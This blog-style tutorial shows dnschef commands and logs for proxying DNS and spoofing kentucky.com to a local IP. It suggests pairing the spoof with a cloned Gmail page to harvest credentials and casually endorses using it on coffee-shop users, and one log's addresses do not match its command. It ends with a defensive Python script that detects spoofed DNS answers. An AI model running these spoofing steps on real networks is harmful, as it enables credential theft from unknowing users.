If you want to spoof some DNS requests then dnschef is the tool to do it. I can never get enough of redirecting innocent Internet surfers to random locations. The one precondition for dnschef to be useful is that client DNS traffic has to reach the BackTrack Linux server running it somehow, which could be done by gaining access to a host and modifying its DNS entries or by poisoning the real DNS server on the network. Below we show a couple of examples of dnschef in action; overall it is very easy to use, and the hard part is the method you use to get the DNS (Domain Name System) traffic to the BackTrack server running dnschef.
A couple of notes before the examples. When you are testing dnschef, do not be surprised if the domains you specify with --fakedomains do not redirect where you expect right away: if these are domains or web sites you visit frequently, your local computer will have a cached DNS entry pointing to the correct IP until that cached entry times out. If you are on a Mac running OS X and want to clear the cache during testing, run "sudo dscacheutil -flushcache" from a terminal window right before you begin. Also, if you have a large number of domains you want to redirect to different IPs, use the --file switch to point at a list of domains and the IPs those domains should resolve to. The dnschef application is written in Python and can be launched from the BackTrack command line by running /pentest/sniffers/dnschef/dnschef.py.
dnschef: Proxy DNS Traffic
root@bt:/pentest/sniffers/dnschef# ./dnschef.py --interface=0.0.0.0 --nameservers=192.168.1.1
         _                _           __
        | | version 0.1  | |         / _|
      __| |_ __  ___  ___| |__   ___| |_
     / _` | '_ \/ __|/ __| '_ \ / _ \  _|
    | (_| | | | \__ \ (__| | | |  __/ |
     \__,_|_| |_|___/\___|_| |_|\___|_|
                  iphelix@thesprawl.org
[*] DNS Chef started on interface: 0.0.0.0
[*] Using the following nameservers: 192.168.1.1
[*] No parameters were specified. Running in full proxy mode
[02:22:54] 192.168.1.199: proxying the response of type 'A' for p08-caldav.icloud.com
[02:22:54] 192.168.1.199: proxying the response of type 'A' for calendar.google.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for www.wdrb.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for b.scorecardresearch.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for ad.doubleclick.net
[02:22:59] 192.168.1.199: proxying the response of type 'A' for ct1.addthis.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for hosted.newsgator.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for nmp.newsgator.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for pix04.revsci.net
[02:22:59] 192.168.1.199: proxying the response of type 'A' for wdrb.images.worldnow.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for wnimages.images.worldnow.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for www.google-analytics.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for content.worldnow.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for studio-5.financialcontent.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for www.question-defense.com
[02:22:59] 192.168.1.199: proxying the response of type 'A' for 1.courier-push-apple.com.akadns.net
[02:22:59] 192.168.1.199: proxying the response of type 'A' for 1.courier-sandbox-push-apple.com.akadns.net
[02:22:59] 192.168.1.199: proxying the response of type 'PTR' for b._dns-sd._udp.0.1.168.192.in-addr.arpa
[02:22:59] 192.168.1.199: proxying the response of type 'PTR' for db._dns-sd._udp.0.1.168.192.in-addr.arpa
[02:22:59] 192.168.1.199: proxying the response of type 'PTR' for r._dns-sd._udp.0.1.168.192.in-addr.arpa
[02:22:59] 192.168.1.199: proxying the response of type 'PTR' for dr._dns-sd._udp.0.1.168.192.in-addr.arpa
In simple proxy mode dnschef forwards every DNS request to an upstream resolver and hands the real answer back to the client; that upstream is Google's public DNS server at 8.8.8.8 unless you name a different one with the --nameservers switch. Also note that dnschef only listens on localhost (127.0.0.1) unless the --interface switch is used to give it a specific interface IP address, or 0.0.0.0 to listen on all interfaces. In the example above we pointed --nameservers at the network's own default name server, but dnschef works just as well without it and falls back to 8.8.8.8. This mode could be useful if you want to analyze network traffic and see where the hosts on the network are going. Last but not least, notice that you see not only A record lookups but every other type of DNS request as well, such as PTR (pointer) requests, AAAA (IPv6 address) requests, MX (mail exchanger) lookups, etc. Below we show an example using more switches and specifically targeting a single domain to redirect to our own IP address. You could do this for, say, Gmail and have a spoofed website configured with SET (Social Engineering Toolkit) to obtain Gmail credentials.
dnschef: Spoof DNS Requests For Specific Domain
root@bt:/pentest/sniffers/dnschef# ./dnschef.py --interface=0.0.0.0 --fakeip=192.168.1.88 --nameservers=192.168.1.1 --fakedomains=kentucky.com
         _                _           __
        | | version 0.1  | |         / _|
      __| |_ __  ___  ___| |__   ___| |_
     / _` | '_ \/ __|/ __| '_ \ / _ \  _|
    | (_| | | | \__ \ (__| | | |  __/ |
     \__,_|_| |_|___/\___|_| |_|\___|_|
                  iphelix@thesprawl.org
[*] DNS Chef started on interface: 0.0.0.0
[*] Using the following nameservers: 192.168.33.1
[*] Cooking replies to point to 192.168.33.88 matching: kentucky.com
[01:58:22] 192.168.1.199: proxying the response of type 'A' for 1.courier-sandbox-push-apple.com.akadns.net
[01:58:23] 192.168.1.199: cooking the response of type 'A' for kentucky.com to 192.168.1.88
[01:58:32] 192.168.1.199: proxying the response of type 'A' for VM2K3SP1.example.com
[01:58:32] 192.168.1.199: proxying the response of type 'AAAA' for VM2K3SP1.example.com
[01:58:53] 192.168.1.199: cooking the response of type 'A' for kentucky.com to 192.168.1.88
[01:58:56] 192.168.1.199: proxying the response of type 'A' for mail.google.com
[01:59:07] 192.168.1.199: proxying the response of type 'A' for 1.courier-push-apple.com.akadns.net
^C[*] DNSChef is shutting down.
root@bt:/pentest/sniffers/dnschef#
Again, notice that for the requests we are not spoofing we also set the DNS server to 192.168.1.1, the internal DNS server on the network. This is done so everything looks normal to the end user, who may depend on entries for local or external resources that exist only on the internal DNS server. In the above example we spoof DNS for a single domain only; we would then set up a web server on 192.168.1.88 to harvest credentials, attempt to gain access to the remote client computer, etc. That pretty much covers dnschef's capabilities, except for the --tcp switch, which proxies DNS over TCP instead of UDP, and the -q switch, which quiets the output by not displaying all of the headers. I really like this tool as it is one of those types of tools you can have a lot of fun with at the coffee shop!
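What both runs above come down to, at the protocol level, is a box in the resolution path that reads the question out of each DNS query (the record type and name dnschef logs on every line) and, for a matching name, answers with an A record of its own choosing instead of the upstream resolver's. The following is an added example written for this page, not code from the original post and not dnschef's own code: a stdlib-only decoder for DNS wire-format messages plus the check a defender can run to notice such "cooked" answers, comparing the response a client actually received against the response a trusted resolver gives for the same question. The packets are constructed inline; 203.0.113.10 is a placeholder for the real address of kentucky.com, and 192.168.1.88 is the --fakeip from the post.

```python
"""Decode DNS messages and flag A-record answers that disagree with a trusted resolver.
Added example; the sample packets below are constructed, not captured traffic."""
import ipaddress
import struct

# RR type codes seen in the post's output (A, AAAA, PTR) plus a few common ones.
QTYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR", 15: "MX", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    """Dotted hostname -> DNS label sequence (no compression)."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split(".") if label)
    return out + b"\x00"


def decode_name(data, offset):
    """Read a possibly compressed name at offset; return (name, offset past it)."""
    labels, end, hops = [], None, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:               # compression pointer (RFC 1035 4.1.4)
            if end is None:
                end = offset + 2                # the name in the stream is 2 bytes long
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def build_message(txid, qname, qtype, answers=(), ttl=300):
    """Build a query (no answers) or a response (with answers). answers: [(rtype, rdata)].
    Used here only to construct sample packets for the check."""
    flags = 0x8180 if answers else 0x0100       # QR|RD|RA for a response, RD for a query
    msg = struct.pack("!HHHHHH", txid, flags, 1, len(answers), 0, 0)
    msg += encode_name(qname) + struct.pack("!HH", qtype, 1)   # QCLASS IN
    for rtype, rdata in answers:
        # 0xC00C: pointer to the question name at offset 12
        msg += b"\xc0\x0c" + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata
    return msg


def rdata_to_text(rtype, rdata):
    if rtype == 1 and len(rdata) == 4:
        return str(ipaddress.IPv4Address(rdata))
    if rtype == 28 and len(rdata) == 16:
        return str(ipaddress.IPv6Address(rdata))
    return rdata.hex()


def parse_message(data):
    """Return header bits, the question section and the answer section of a DNS message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(data, offset)
        qtype, _qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((name, QTYPE_NAMES.get(qtype, str(qtype))))
    for _ in range(an):
        name, offset = decode_name(data, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        answers.append((name, QTYPE_NAMES.get(rtype, str(rtype)), ttl, rdata_to_text(rtype, rdata)))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def query_summary(data):
    """The two fields a proxy like dnschef logs per request: record type and name."""
    return [f"{qtype} {name}" for name, qtype in parse_message(data)["questions"]]


def spoof_check(observed, trusted):
    """A records present in the observed response but absent from the trusted resolver's
    response to the same question. Non-empty means something on the path is rewriting answers."""
    obs, ref = parse_message(observed), parse_message(trusted)
    if obs["questions"] != ref["questions"]:
        raise ValueError("responses answer different questions")
    obs_a = {(n, v) for n, t, _, v in obs["answers"] if t == "A"}
    ref_a = {(n, v) for n, t, _, v in ref["answers"] if t == "A"}
    return sorted(obs_a - ref_a)


# Constructed sample traffic (placeholder addresses, not captured from the post's network).
QUERY = build_message(0x1234, "kentucky.com", 1)
TRUSTED = build_message(0x1234, "kentucky.com", 1, [(1, ipaddress.IPv4Address("203.0.113.10").packed)])
COOKED = build_message(0x1234, "kentucky.com", 1, [(1, ipaddress.IPv4Address("192.168.1.88").packed)])

if __name__ == "__main__":
    print(query_summary(QUERY))            # ['A kentucky.com']
    print(spoof_check(COOKED, TRUSTED))    # [('kentucky.com', '192.168.1.88')]
    print(spoof_check(TRUSTED, TRUSTED))   # []
```

To use this on a real network, feed `spoof_check` the raw UDP payload of a response the client received (from a packet capture) and the payload of the same question sent to the resolver the client is supposed to be using. Names served through a CDN or split-horizon DNS can legitimately differ between resolvers, so a mismatch is a lead rather than a verdict; a public name answering with an internal address, like kentucky.com landing on 192.168.1.88 above, is the clearest sign of an answer that was cooked rather than proxied.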